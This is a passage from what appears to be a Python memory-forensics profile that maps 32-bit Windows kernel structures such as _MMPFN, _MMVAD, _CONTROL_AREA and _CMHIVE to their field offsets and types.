'RelatedFileObject' : [ 0x20, ['pointer', ['_FILE_OBJECT']]],
'LockOperation' : [ 0x24, ['unsigned char']],
'DeletePending' : [ 0x25, ['unsigned char']],
'ReadAccess' : [ 0x26, ['unsigned char']],
'WriteAccess' : [ 0x27, ['unsigned char']],
'DeleteAccess' : [ 0x28, ['unsigned char']],
'SharedRead' : [ 0x29, ['unsigned char']],
'SharedWrite' : [ 0x2a, ['unsigned char']],
'SharedDelete' : [ 0x2b, ['unsigned char']],
'Flags' : [ 0x2c, ['unsigned long']],
'FileName' : [ 0x30, ['_UNICODE_STRING']],
'CurrentByteOffset' : [ 0x38, ['_LARGE_INTEGER']],
'Waiters' : [ 0x40, ['unsigned long']],
'Busy' : [ 0x44, ['unsigned long']],
'LastLock' : [ 0x48, ['pointer', ['void']]],
'Lock' : [ 0x4c, ['_KEVENT']],
'Event' : [ 0x5c, ['_KEVENT']],
'CompletionContext' : [ 0x6c, ['pointer', ['_IO_COMPLETION_CONTEXT']]],
'IrpListLock' : [ 0x70, ['unsigned long']],
'IrpList' : [ 0x74, ['_LIST_ENTRY']],
'FileObjectExtension' : [ 0x7c, ['pointer', ['void']]],
} ],
'_EX_RUNDOWN_REF' : [ 0x4, {
'Count' : [ 0x0, ['unsigned long']],
'Ptr' : [ 0x0, ['pointer', ['void']]],
} ],
'_MM_PAGE_ACCESS_INFO_HEADER' : [ 0x38, {
'Link' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Type' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'MmPteAccessType', 1: 'MmCcReadAheadType', 2: 'MmPfnRepurposeType', 3: 'MmMaximumPageAccessType'})]],
'EmptySequenceNumber' : [ 0x8, ['unsigned long']],
'CurrentFileIndex' : [ 0x8, ['unsigned long']],
'CreateTime' : [ 0x10, ['unsigned long long']],
'EmptyTime' : [ 0x18, ['unsigned long long']],
'TempEntry' : [ 0x18, ['pointer', ['_MM_PAGE_ACCESS_INFO']]],
'PageEntry' : [ 0x20, ['pointer', ['_MM_PAGE_ACCESS_INFO']]],
'FileEntry' : [ 0x24, ['pointer', ['unsigned long']]],
'FirstFileEntry' : [ 0x28, ['pointer', ['unsigned long']]],
'Process' : [ 0x2c, ['pointer', ['_EPROCESS']]],
'SessionId' : [ 0x30, ['unsigned long']],
'PageFrameEntry' : [ 0x20, ['pointer', ['unsigned long']]],
'LastPageFrameEntry' : [ 0x24, ['pointer', ['unsigned long']]],
} ],
'_WHEA_ERROR_PACKET_V2' : [ 0x50, {
'Signature' : [ 0x0, ['unsigned long']],
'Version' : [ 0x4, ['unsigned long']],
'Length' : [ 0x8, ['unsigned long']],
'Flags' : [ 0xc, ['_WHEA_ERROR_PACKET_FLAGS']],
'ErrorType' : [ 0x10, ['Enumeration', dict(target = 'long', choices = {0: 'WheaErrTypeProcessor', 1: 'WheaErrTypeMemory', 2: 'WheaErrTypePCIExpress', 3: 'WheaErrTypeNMI', 4: 'WheaErrTypePCIXBus', 5: 'WheaErrTypePCIXDevice', 6: 'WheaErrTypeGeneric'})]],
'ErrorSeverity' : [ 0x14, ['Enumeration', dict(target = 'long', choices = {0: 'WheaErrSevRecoverable', 1: 'WheaErrSevFatal', 2: 'WheaErrSevCorrected', 3: 'WheaErrSevInformational'})]],
'ErrorSourceId' : [ 0x18, ['unsigned long']],
'ErrorSourceType' : [ 0x1c, ['Enumeration', dict(target = 'long', choices = {0: 'WheaErrSrcTypeMCE', 1: 'WheaErrSrcTypeCMC', 2: 'WheaErrSrcTypeCPE', 3: 'WheaErrSrcTypeNMI', 4: 'WheaErrSrcTypePCIe', 5: 'WheaErrSrcTypeGeneric', 6: 'WheaErrSrcTypeINIT', 7: 'WheaErrSrcTypeBOOT', 8: 'WheaErrSrcTypeSCIGeneric', 9: 'WheaErrSrcTypeIPFMCA', 10: 'WheaErrSrcTypeIPFCMC', 11: 'WheaErrSrcTypeIPFCPE', 12: 'WheaErrSrcTypeMax'})]],
'NotifyType' : [ 0x20, ['_GUID']],
'Context' : [ 0x30, ['unsigned long long']],
'DataFormat' : [ 0x38, ['Enumeration', dict(target = 'long', choices = {0: 'WheaDataFormatIPFSalRecord', 1: 'WheaDataFormatXPFMCA', 2: 'WheaDataFormatMemory', 3: 'WheaDataFormatPCIExpress', 4: 'WheaDataFormatNMIPort', 5: 'WheaDataFormatPCIXBus', 6: 'WheaDataFormatPCIXDevice', 7: 'WheaDataFormatGeneric', 8: 'WheaDataFormatMax'})]],
'Reserved1' : [ 0x3c, ['unsigned long']],
'DataOffset' : [ 0x40, ['unsigned long']],
'DataLength' : [ 0x44, ['unsigned long']],
'PshedDataOffset' : [ 0x48, ['unsigned long']],
'PshedDataLength' : [ 0x4c, ['unsigned long']],
} ],
'_WHEA_ERROR_RECORD' : [ 0xc8, {
'Header' : [ 0x0, ['_WHEA_ERROR_RECORD_HEADER']],
'SectionDescriptor' : [ 0x80, ['array', 1, ['_WHEA_ERROR_RECORD_SECTION_DESCRIPTOR']]],
} ],
'_WHEA_ERROR_RECORD_SECTION_DESCRIPTOR' : [ 0x48, {
'SectionOffset' : [ 0x0, ['unsigned long']],
'SectionLength' : [ 0x4, ['unsigned long']],
'Revision' : [ 0x8, ['_WHEA_REVISION']],
'ValidBits' : [ 0xa, ['_WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_VALIDBITS']],
'Reserved' : [ 0xb, ['unsigned char']],
'Flags' : [ 0xc, ['_WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_FLAGS']],
'SectionType' : [ 0x10, ['_GUID']],
'FRUId' : [ 0x20, ['_GUID']],
'SectionSeverity' : [ 0x30, ['Enumeration', dict(target = 'long', choices = {0: 'WheaErrSevRecoverable', 1: 'WheaErrSevFatal', 2: 'WheaErrSevCorrected', 3: 'WheaErrSevInformational'})]],
'FRUText' : [ 0x34, ['array', 20, ['unsigned char']]],
} ],
'_GUID' : [ 0x10, {
'Data1' : [ 0x0, ['unsigned long']],
'Data2' : [ 0x4, ['unsigned short']],
'Data3' : [ 0x6, ['unsigned short']],
'Data4' : [ 0x8, ['array', 8, ['unsigned char']]],
} ],
'_FSRTL_ADVANCED_FCB_HEADER' : [ 0x40, {
'NodeTypeCode' : [ 0x0, ['short']],
'NodeByteSize' : [ 0x2, ['short']],
'Flags' : [ 0x4, ['unsigned char']],
'IsFastIoPossible' : [ 0x5, ['unsigned char']],
'Flags2' : [ 0x6, ['unsigned char']],
'Reserved' : [ 0x7, ['BitField', dict(start_bit = 0, end_bit = 4, native_type='unsigned char')]],
'Version' : [ 0x7, ['BitField', dict(start_bit = 4, end_bit = 8, native_type='unsigned char')]],
'Resource' : [ 0x8, ['pointer', ['_ERESOURCE']]],
'PagingIoResource' : [ 0xc, ['pointer', ['_ERESOURCE']]],
'AllocationSize' : [ 0x10, ['_LARGE_INTEGER']],
'FileSize' : [ 0x18, ['_LARGE_INTEGER']],
'ValidDataLength' : [ 0x20, ['_LARGE_INTEGER']],
'FastMutex' : [ 0x28, ['pointer', ['_FAST_MUTEX']]],
'FilterContexts' : [ 0x2c, ['_LIST_ENTRY']],
'PushLock' : [ 0x34, ['_EX_PUSH_LOCK']],
'FileContextSupportPointer' : [ 0x38, ['pointer', ['pointer', ['void']]]],
} ],
'_iobuf' : [ 0x20, {
'_ptr' : [ 0x0, ['pointer', ['unsigned char']]],
'_cnt' : [ 0x4, ['long']],
'_base' : [ 0x8, ['pointer', ['unsigned char']]],
'_flag' : [ 0xc, ['long']],
'_file' : [ 0x10, ['long']],
'_charbuf' : [ 0x14, ['long']],
'_bufsiz' : [ 0x18, ['long']],
'_tmpfname' : [ 0x1c, ['pointer', ['unsigned char']]],
} ],
'__unnamed_14ad' : [ 0x4, {
'Long' : [ 0x0, ['unsigned long']],
'VolatileLong' : [ 0x0, ['unsigned long']],
'Flush' : [ 0x0, ['_HARDWARE_PTE']],
'Hard' : [ 0x0, ['_MMPTE_HARDWARE']],
'Proto' : [ 0x0, ['_MMPTE_PROTOTYPE']],
'Soft' : [ 0x0, ['_MMPTE_SOFTWARE']],
'TimeStamp' : [ 0x0, ['_MMPTE_TIMESTAMP']],
'Trans' : [ 0x0, ['_MMPTE_TRANSITION']],
'Subsect' : [ 0x0, ['_MMPTE_SUBSECTION']],
'List' : [ 0x0, ['_MMPTE_LIST']],
} ],
'_MMPTE' : [ 0x4, {
'u' : [ 0x0, ['__unnamed_14ad']],
} ],
'__unnamed_14be' : [ 0xc, {
'I386' : [ 0x0, ['_I386_LOADER_BLOCK']],
'Ia64' : [ 0x0, ['_IA64_LOADER_BLOCK']],
} ],
'_LOADER_PARAMETER_BLOCK' : [ 0x88, {
'OsMajorVersion' : [ 0x0, ['unsigned long']],
'OsMinorVersion' : [ 0x4, ['unsigned long']],
'Size' : [ 0x8, ['unsigned long']],
'Reserved' : [ 0xc, ['unsigned long']],
'LoadOrderListHead' : [ 0x10, ['_LIST_ENTRY']],
'MemoryDescriptorListHead' : [ 0x18, ['_LIST_ENTRY']],
'BootDriverListHead' : [ 0x20, ['_LIST_ENTRY']],
'KernelStack' : [ 0x28, ['unsigned long']],
'Prcb' : [ 0x2c, ['unsigned long']],
'Process' : [ 0x30, ['unsigned long']],
'Thread' : [ 0x34, ['unsigned long']],
'RegistryLength' : [ 0x38, ['unsigned long']],
'RegistryBase' : [ 0x3c, ['pointer', ['void']]],
'ConfigurationRoot' : [ 0x40, ['pointer', ['_CONFIGURATION_COMPONENT_DATA']]],
'ArcBootDeviceName' : [ 0x44, ['pointer', ['unsigned char']]],
'ArcHalDeviceName' : [ 0x48, ['pointer', ['unsigned char']]],
'NtBootPathName' : [ 0x4c, ['pointer', ['unsigned char']]],
'NtHalPathName' : [ 0x50, ['pointer', ['unsigned char']]],
'LoadOptions' : [ 0x54, ['pointer', ['unsigned char']]],
'NlsData' : [ 0x58, ['pointer', ['_NLS_DATA_BLOCK']]],
'ArcDiskInformation' : [ 0x5c, ['pointer', ['_ARC_DISK_INFORMATION']]],
'OemFontFile' : [ 0x60, ['pointer', ['void']]],
'Extension' : [ 0x64, ['pointer', ['_LOADER_PARAMETER_EXTENSION']]],
'u' : [ 0x68, ['__unnamed_14be']],
'FirmwareInformation' : [ 0x74, ['_FIRMWARE_INFORMATION_LOADER_BLOCK']],
} ],
'_KLOCK_QUEUE_HANDLE' : [ 0xc, {
'LockQueue' : [ 0x0, ['_KSPIN_LOCK_QUEUE']],
'OldIrql' : [ 0x8, ['unsigned char']],
} ],
'_MMPFNLIST' : [ 0x14, {
'Total' : [ 0x0, ['unsigned long']],
'ListName' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'ZeroedPageList', 1: 'FreePageList', 2: 'StandbyPageList', 3: 'ModifiedPageList', 4: 'ModifiedNoWritePageList', 5: 'BadPageList', 6: 'ActiveAndValid', 7: 'TransitionPage'})]],
'Flink' : [ 0x8, ['unsigned long']],
'Blink' : [ 0xc, ['unsigned long']],
'Lock' : [ 0x10, ['unsigned long']],
} ],
'__unnamed_14ef' : [ 0x4, {
'Flink' : [ 0x0, ['unsigned long']],
'WsIndex' : [ 0x0, ['unsigned long']],
'Event' : [ 0x0, ['pointer', ['_KEVENT']]],
'Next' : [ 0x0, ['pointer', ['void']]],
'VolatileNext' : [ 0x0, ['pointer', ['void']]],
'KernelStackOwner' : [ 0x0, ['pointer', ['_KTHREAD']]],
'NextStackPfn' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
} ],
'__unnamed_14f1' : [ 0x4, {
'Blink' : [ 0x0, ['unsigned long']],
'ImageProtoPte' : [ 0x0, ['pointer', ['_MMPTE']]],
'ShareCount' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_14f4' : [ 0x4, {
'ReferenceCount' : [ 0x0, ['unsigned short']],
'VolatileReferenceCount' : [ 0x0, ['short']],
'ShortFlags' : [ 0x2, ['unsigned short']],
} ],
'__unnamed_14f6' : [ 0x4, {
'ReferenceCount' : [ 0x0, ['unsigned short']],
'e1' : [ 0x2, ['_MMPFNENTRY']],
'e2' : [ 0x0, ['__unnamed_14f4']],
} ],
'__unnamed_14fb' : [ 0x4, {
'PteFrame' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 25, native_type='unsigned long')]],
'PfnImageVerified' : [ 0x0, ['BitField', dict(start_bit = 25, end_bit = 26, native_type='unsigned long')]],
'AweAllocation' : [ 0x0, ['BitField', dict(start_bit = 26, end_bit = 27, native_type='unsigned long')]],
'PrototypePte' : [ 0x0, ['BitField', dict(start_bit = 27, end_bit = 28, native_type='unsigned long')]],
'PageColor' : [ 0x0, ['BitField', dict(start_bit = 28, end_bit = 32, native_type='unsigned long')]],
} ],
'_MMPFN' : [ 0x18, {
'u1' : [ 0x0, ['__unnamed_14ef']],
'u2' : [ 0x4, ['__unnamed_14f1']],
'PteAddress' : [ 0x8, ['pointer', ['_MMPTE']]],
'VolatilePteAddress' : [ 0x8, ['pointer', ['void']]],
'Lock' : [ 0x8, ['long']],
'PteLong' : [ 0x8, ['unsigned long']],
'u3' : [ 0xc, ['__unnamed_14f6']],
'OriginalPte' : [ 0x10, ['_MMPTE']],
'AweReferenceCount' : [ 0x10, ['long']],
'u4' : [ 0x14, ['__unnamed_14fb']],
} ],
'_MI_COLOR_BASE' : [ 0x8, {
'ColorPointer' : [ 0x0, ['pointer', ['unsigned short']]],
'ColorMask' : [ 0x4, ['unsigned short']],
'ColorNode' : [ 0x6, ['unsigned short']],
} ],
'_MMSUPPORT' : [ 0x6c, {
'WorkingSetMutex' : [ 0x0, ['_EX_PUSH_LOCK']],
'ExitGate' : [ 0x4, ['pointer', ['_KGATE']]],
'AccessLog' : [ 0x8, ['pointer', ['void']]],
'WorkingSetExpansionLinks' : [ 0xc, ['_LIST_ENTRY']],
'AgeDistribution' : [ 0x14, ['array', 7, ['unsigned long']]],
'MinimumWorkingSetSize' : [ 0x30, ['unsigned long']],
'WorkingSetSize' : [ 0x34, ['unsigned long']],
'WorkingSetPrivateSize' : [ 0x38, ['unsigned long']],
'MaximumWorkingSetSize' : [ 0x3c, ['unsigned long']],
'ChargedWslePages' : [ 0x40, ['unsigned long']],
'ActualWslePages' : [ 0x44, ['unsigned long']],
'WorkingSetSizeOverhead' : [ 0x48, ['unsigned long']],
'PeakWorkingSetSize' : [ 0x4c, ['unsigned long']],
'HardFaultCount' : [ 0x50, ['unsigned long']],
'VmWorkingSetList' : [ 0x54, ['pointer', ['_MMWSL']]],
'NextPageColor' : [ 0x58, ['unsigned short']],
'LastTrimStamp' : [ 0x5a, ['unsigned short']],
'PageFaultCount' : [ 0x5c, ['unsigned long']],
'RepurposeCount' : [ 0x60, ['unsigned long']],
'Spare' : [ 0x64, ['array', 1, ['unsigned long']]],
'Flags' : [ 0x68, ['_MMSUPPORT_FLAGS']],
} ],
'_MMWSL' : [ 0x6a8, {
'FirstFree' : [ 0x0, ['unsigned long']],
'FirstDynamic' : [ 0x4, ['unsigned long']],
'LastEntry' : [ 0x8, ['unsigned long']],
'NextSlot' : [ 0xc, ['unsigned long']],
'Wsle' : [ 0x10, ['pointer', ['_MMWSLE']]],
'LowestPagableAddress' : [ 0x14, ['pointer', ['void']]],
'LastInitializedWsle' : [ 0x18, ['unsigned long']],
'NextAgingSlot' : [ 0x1c, ['unsigned long']],
'NumberOfCommittedPageTables' : [ 0x20, ['unsigned long']],
'VadBitMapHint' : [ 0x24, ['unsigned long']],
'NonDirectCount' : [ 0x28, ['unsigned long']],
'LastVadBit' : [ 0x2c, ['unsigned long']],
'MaximumLastVadBit' : [ 0x30, ['unsigned long']],
'LastAllocationSizeHint' : [ 0x34, ['unsigned long']],
'LastAllocationSize' : [ 0x38, ['unsigned long']],
'NonDirectHash' : [ 0x3c, ['pointer', ['_MMWSLE_NONDIRECT_HASH']]],
'HashTableStart' : [ 0x40, ['pointer', ['_MMWSLE_HASH']]],
'HighestPermittedHashAddress' : [ 0x44, ['pointer', ['_MMWSLE_HASH']]],
'UsedPageTableEntries' : [ 0x48, ['array', 768, ['unsigned short']]],
'CommittedPageTables' : [ 0x648, ['array', 24, ['unsigned long']]],
} ],
'__unnamed_152b' : [ 0x4, {
'VirtualAddress' : [ 0x0, ['pointer', ['void']]],
'Long' : [ 0x0, ['unsigned long']],
'e1' : [ 0x0, ['_MMWSLENTRY']],
'e2' : [ 0x0, ['_MMWSLE_FREE_ENTRY']],
} ],
'_MMWSLE' : [ 0x4, {
'u1' : [ 0x0, ['__unnamed_152b']],
} ],
'__unnamed_153a' : [ 0x4, {
'LongFlags' : [ 0x0, ['unsigned long']],
'Flags' : [ 0x0, ['_MMSECTION_FLAGS']],
} ],
'__unnamed_1544' : [ 0xc, {
'NumberOfSystemCacheViews' : [ 0x0, ['unsigned long']],
'ImageRelocationStartBit' : [ 0x0, ['unsigned long']],
'WritableUserReferences' : [ 0x4, ['long']],
'ImageRelocationSizeIn64k' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long')]],
'Unused' : [ 0x4, ['BitField', dict(start_bit = 16, end_bit = 30, native_type='unsigned long')]],
'BitMap64' : [ 0x4, ['BitField', dict(start_bit = 30, end_bit = 31, native_type='unsigned long')]],
'ImageActive' : [ 0x4, ['BitField', dict(start_bit = 31, end_bit = 32, native_type='unsigned long')]],
'SubsectionRoot' : [ 0x8, ['pointer', ['_MM_SUBSECTION_AVL_TABLE']]],
'SeImageStub' : [ 0x8, ['pointer', ['_MI_IMAGE_SECURITY_REFERENCE']]],
} ],
'__unnamed_1546' : [ 0xc, {
'e2' : [ 0x0, ['__unnamed_1544']],
} ],
'_CONTROL_AREA' : [ 0x50, {
'Segment' : [ 0x0, ['pointer', ['_SEGMENT']]],
'DereferenceList' : [ 0x4, ['_LIST_ENTRY']],
'NumberOfSectionReferences' : [ 0xc, ['unsigned long']],
'NumberOfPfnReferences' : [ 0x10, ['unsigned long']],
'NumberOfMappedViews' : [ 0x14, ['unsigned long']],
'NumberOfUserReferences' : [ 0x18, ['unsigned long']],
'u' : [ 0x1c, ['__unnamed_153a']],
'FlushInProgressCount' : [ 0x20, ['unsigned long']],
'FilePointer' : [ 0x24, ['_EX_FAST_REF']],
'ControlAreaLock' : [ 0x28, ['long']],
'ModifiedWriteCount' : [ 0x2c, ['unsigned long']],
'StartingFrame' : [ 0x2c, ['unsigned long']],
'WaitingForDeletion' : [ 0x30, ['pointer', ['_MI_SECTION_CREATION_GATE']]],
'u2' : [ 0x34, ['__unnamed_1546']],
'LockedPages' : [ 0x40, ['long long']],
'ViewList' : [ 0x48, ['_LIST_ENTRY']],
} ],
'_MM_STORE_KEY' : [ 0x4, {
'KeyLow' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 28, native_type='unsigned long')]],
'KeyHigh' : [ 0x0, ['BitField', dict(start_bit = 28, end_bit = 32, native_type='unsigned long')]],
'EntireKey' : [ 0x0, ['unsigned long']],
} ],
'_MMPAGING_FILE' : [ 0x50, {
'Size' : [ 0x0, ['unsigned long']],
'MaximumSize' : [ 0x4, ['unsigned long']],
'MinimumSize' : [ 0x8, ['unsigned long']],
'FreeSpace' : [ 0xc, ['unsigned long']],
'PeakUsage' : [ 0x10, ['unsigned long']],
'HighestPage' : [ 0x14, ['unsigned long']],
'File' : [ 0x18, ['pointer', ['_FILE_OBJECT']]],
'Entry' : [ 0x1c, ['array', 2, ['pointer', ['_MMMOD_WRITER_MDL_ENTRY']]]],
'PageFileName' : [ 0x24, ['_UNICODE_STRING']],
'Bitmap' : [ 0x2c, ['pointer', ['_RTL_BITMAP']]],
'EvictStoreBitmap' : [ 0x30, ['pointer', ['_RTL_BITMAP']]],
'BitmapHint' : [ 0x34, ['unsigned long']],
'LastAllocationSize' : [ 0x38, ['unsigned long']],
'ToBeEvictedCount' : [ 0x3c, ['unsigned long']],
'PageFileNumber' : [ 0x40, ['BitField', dict(start_bit = 0, end_bit = 4, native_type='unsigned short')]],
'BootPartition' : [ 0x40, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned short')]],
'Spare0' : [ 0x40, ['BitField', dict(start_bit = 5, end_bit = 16, native_type='unsigned short')]],
'AdriftMdls' : [ 0x42, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'Spare1' : [ 0x42, ['BitField', dict(start_bit = 1, end_bit = 16, native_type='unsigned short')]],
'FileHandle' : [ 0x44, ['pointer', ['void']]],
'Lock' : [ 0x48, ['unsigned long']],
'LockOwner' : [ 0x4c, ['pointer', ['_ETHREAD']]],
} ],
'_RTL_BITMAP' : [ 0x8, {
'SizeOfBitMap' : [ 0x0, ['unsigned long']],
'Buffer' : [ 0x4, ['pointer', ['unsigned long']]],
} ],
'_MM_AVL_TABLE' : [ 0x20, {
'BalancedRoot' : [ 0x0, ['_MMADDRESS_NODE']],
'DepthOfTree' : [ 0x14, ['BitField', dict(start_bit = 0, end_bit = 5, native_type='unsigned long')]],
'Unused' : [ 0x14, ['BitField', dict(start_bit = 5, end_bit = 8, native_type='unsigned long')]],
'NumberGenericTableElements' : [ 0x14, ['BitField', dict(start_bit = 8, end_bit = 32, native_type='unsigned long')]],
'NodeHint' : [ 0x18, ['pointer', ['void']]],
'NodeFreeHint' : [ 0x1c, ['pointer', ['void']]],
} ],
'__unnamed_1580' : [ 0x4, {
'Balance' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='long')]],
'Parent' : [ 0x0, ['pointer', ['_MMVAD']]],
} ],
'__unnamed_1583' : [ 0x4, {
'LongFlags' : [ 0x0, ['unsigned long']],
'VadFlags' : [ 0x0, ['_MMVAD_FLAGS']],
} ],
'__unnamed_1586' : [ 0x4, {
'LongFlags3' : [ 0x0, ['unsigned long']],
'VadFlags3' : [ 0x0, ['_MMVAD_FLAGS3']],
} ],
'_MMVAD_SHORT' : [ 0x20, {
'u1' : [ 0x0, ['__unnamed_1580']],
'LeftChild' : [ 0x4, ['pointer', ['_MMVAD']]],
'RightChild' : [ 0x8, ['pointer', ['_MMVAD']]],
'StartingVpn' : [ 0xc, ['unsigned long']],
'EndingVpn' : [ 0x10, ['unsigned long']],
'u' : [ 0x14, ['__unnamed_1583']],
'PushLock' : [ 0x18, ['_EX_PUSH_LOCK']],
'u5' : [ 0x1c, ['__unnamed_1586']],
} ],
'__unnamed_158e' : [ 0x4, {
'Balance' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='long')]],
'Parent' : [ 0x0, ['pointer', ['_MMADDRESS_NODE']]],
} ],
'_MMADDRESS_NODE' : [ 0x14, {
'u1' : [ 0x0, ['__unnamed_158e']],
'LeftChild' : [ 0x4, ['pointer', ['_MMADDRESS_NODE']]],
'RightChild' : [ 0x8, ['pointer', ['_MMADDRESS_NODE']]],
'StartingVpn' : [ 0xc, ['unsigned long']],
'EndingVpn' : [ 0x10, ['unsigned long']],
} ],
'__unnamed_1593' : [ 0x4, {
'LongFlags2' : [ 0x0, ['unsigned long']],
'VadFlags2' : [ 0x0, ['_MMVAD_FLAGS2']],
} ],
'_MMVAD' : [ 0x3c, {
'u1' : [ 0x0, ['__unnamed_1580']],
'LeftChild' : [ 0x4, ['pointer', ['_MMVAD']]],
'RightChild' : [ 0x8, ['pointer', ['_MMVAD']]],
'StartingVpn' : [ 0xc, ['unsigned long']],
'EndingVpn' : [ 0x10, ['unsigned long']],
'u' : [ 0x14, ['__unnamed_1583']],
'PushLock' : [ 0x18, ['_EX_PUSH_LOCK']],
'u5' : [ 0x1c, ['__unnamed_1586']],
'u2' : [ 0x20, ['__unnamed_1593']],
'Subsection' : [ 0x24, ['pointer', ['_SUBSECTION']]],
'MappedSubsection' : [ 0x24, ['pointer', ['_MSUBSECTION']]],
'FirstPrototypePte' : [ 0x28, ['pointer', ['_MMPTE']]],
'LastContiguousPte' : [ 0x2c, ['pointer', ['_MMPTE']]],
'ViewLinks' : [ 0x30, ['_LIST_ENTRY']],
'VadsProcess' : [ 0x38, ['pointer', ['_EPROCESS']]],
} ],
'__unnamed_159e' : [ 0x20, {
'Mdl' : [ 0x0, ['_MDL']],
'Page' : [ 0x1c, ['array', 1, ['unsigned long']]],
} ],
'_MI_PAGEFILE_TRACES' : [ 0x40, {
'Status' : [ 0x0, ['long']],
'Priority' : [ 0x4, ['unsigned char']],
'IrpPriority' : [ 0x5, ['unsigned char']],
'CurrentTime' : [ 0x8, ['_LARGE_INTEGER']],
'AvailablePages' : [ 0x10, ['unsigned long']],
'ModifiedPagesTotal' : [ 0x14, ['unsigned long']],
'ModifiedPagefilePages' : [ 0x18, ['unsigned long']],
'ModifiedNoWritePages' : [ 0x1c, ['unsigned long']],
'MdlHack' : [ 0x20, ['__unnamed_159e']],
} ],
'__unnamed_15a4' : [ 0x8, {
'IoStatus' : [ 0x0, ['_IO_STATUS_BLOCK']],
} ],
'__unnamed_15a6' : [ 0x4, {
'KeepForever' : [ 0x0, ['unsigned long']],
} ],
'_MMMOD_WRITER_MDL_ENTRY' : [ 0x60, {
'Links' : [ 0x0, ['_LIST_ENTRY']],
'u' : [ 0x8, ['__unnamed_15a4']],
'Irp' : [ 0x10, ['pointer', ['_IRP']]],
'u1' : [ 0x14, ['__unnamed_15a6']],
'PagingFile' : [ 0x18, ['pointer', ['_MMPAGING_FILE']]],
'File' : [ 0x1c, ['pointer', ['_FILE_OBJECT']]],
'ControlArea' : [ 0x20, ['pointer', ['_CONTROL_AREA']]],
'FileResource' : [ 0x24, ['pointer', ['_ERESOURCE']]],
'WriteOffset' : [ 0x28, ['_LARGE_INTEGER']],
'IssueTime' : [ 0x30, ['_LARGE_INTEGER']],
'PointerMdl' : [ 0x38, ['pointer', ['_MDL']]],
'Mdl' : [ 0x3c, ['_MDL']],
'Page' : [ 0x58, ['array', 1, ['unsigned long']]],
} ],
'_MDL' : [ 0x1c, {
'Next' : [ 0x0, ['pointer', ['_MDL']]],
'Size' : [ 0x4, ['short']],
'MdlFlags' : [ 0x6, ['short']],
'Process' : [ 0x8, ['pointer', ['_EPROCESS']]],
'MappedSystemVa' : [ 0xc, ['pointer', ['void']]],
'StartVa' : [ 0x10, ['pointer', ['void']]],
'ByteCount' : [ 0x14, ['unsigned long']],
'ByteOffset' : [ 0x18, ['unsigned long']],
} ],
'_HHIVE' : [ 0x2ec, {
'Signature' : [ 0x0, ['unsigned long']],
'GetCellRoutine' : [ 0x4, ['pointer', ['void']]],
'ReleaseCellRoutine' : [ 0x8, ['pointer', ['void']]],
'Allocate' : [ 0xc, ['pointer', ['void']]],
'Free' : [ 0x10, ['pointer', ['void']]],
'FileSetSize' : [ 0x14, ['pointer', ['void']]],
'FileWrite' : [ 0x18, ['pointer', ['void']]],
'FileRead' : [ 0x1c, ['pointer', ['void']]],
'FileFlush' : [ 0x20, ['pointer', ['void']]],
'HiveLoadFailure' : [ 0x24, ['pointer', ['void']]],
'BaseBlock' : [ 0x28, ['pointer', ['_HBASE_BLOCK']]],
'DirtyVector' : [ 0x2c, ['_RTL_BITMAP']],
'DirtyCount' : [ 0x34, ['unsigned long']],
'DirtyAlloc' : [ 0x38, ['unsigned long']],
'BaseBlockAlloc' : [ 0x3c, ['unsigned long']],
'Cluster' : [ 0x40, ['unsigned long']],
'Flat' : [ 0x44, ['unsigned char']],
'ReadOnly' : [ 0x45, ['unsigned char']],
'DirtyFlag' : [ 0x46, ['unsigned char']],
'HvBinHeadersUse' : [ 0x48, ['unsigned long']],
'HvFreeCellsUse' : [ 0x4c, ['unsigned long']],
'HvUsedCellsUse' : [ 0x50, ['unsigned long']],
'CmUsedCellsUse' : [ 0x54, ['unsigned long']],
'HiveFlags' : [ 0x58, ['unsigned long']],
'CurrentLog' : [ 0x5c, ['unsigned long']],
'LogSize' : [ 0x60, ['array', 2, ['unsigned long']]],
'RefreshCount' : [ 0x68, ['unsigned long']],
'StorageTypeCount' : [ 0x6c, ['unsigned long']],
'Version' : [ 0x70, ['unsigned long']],
'Storage' : [ 0x74, ['array', 2, ['_DUAL']]],
} ],
'_CM_VIEW_OF_FILE' : [ 0x30, {
'MappedViewLinks' : [ 0x0, ['_LIST_ENTRY']],
'PinnedViewLinks' : [ 0x8, ['_LIST_ENTRY']],
'FlushedViewLinks' : [ 0x10, ['_LIST_ENTRY']],
'CmHive' : [ 0x18, ['pointer', ['_CMHIVE']]],
'Bcb' : [ 0x1c, ['pointer', ['void']]],
'ViewAddress' : [ 0x20, ['pointer', ['void']]],
'FileOffset' : [ 0x24, ['unsigned long']],
'Size' : [ 0x28, ['unsigned long']],
'UseCount' : [ 0x2c, ['unsigned long']],
} ],
'_CMHIVE' : [ 0x630, {
'Hive' : [ 0x0, ['_HHIVE']],
'FileHandles' : [ 0x2ec, ['array', 6, ['pointer', ['void']]]],
'NotifyList' : [ 0x304, ['_LIST_ENTRY']],
'HiveList' : [ 0x30c, ['_LIST_ENTRY']],
'PreloadedHiveList' : [ 0x314, ['_LIST_ENTRY']],
'HiveRundown' : [ 0x31c, ['_EX_RUNDOWN_REF']],
'ParseCacheEntries' : [ 0x320, ['_LIST_ENTRY']],
'KcbCacheTable' : [ 0x328, ['pointer', ['_CM_KEY_HASH_TABLE_ENTRY']]],
'KcbCacheTableSize' : [ 0x32c, ['unsigned long']],
'Identity' : [ 0x330, ['unsigned long']],
'HiveLock' : [ 0x334, ['pointer', ['_FAST_MUTEX']]],
'ViewLock' : [ 0x338, ['_EX_PUSH_LOCK']],
'ViewLockOwner' : [ 0x33c, ['pointer', ['_KTHREAD']]],
'ViewLockLast' : [ 0x340, ['unsigned long']],
'ViewUnLockLast' : [ 0x344, ['unsigned long']],
'WriterLock' : [ 0x348, ['pointer', ['_FAST_MUTEX']]],
'FlusherLock' : [ 0x34c, ['pointer', ['_ERESOURCE']]],
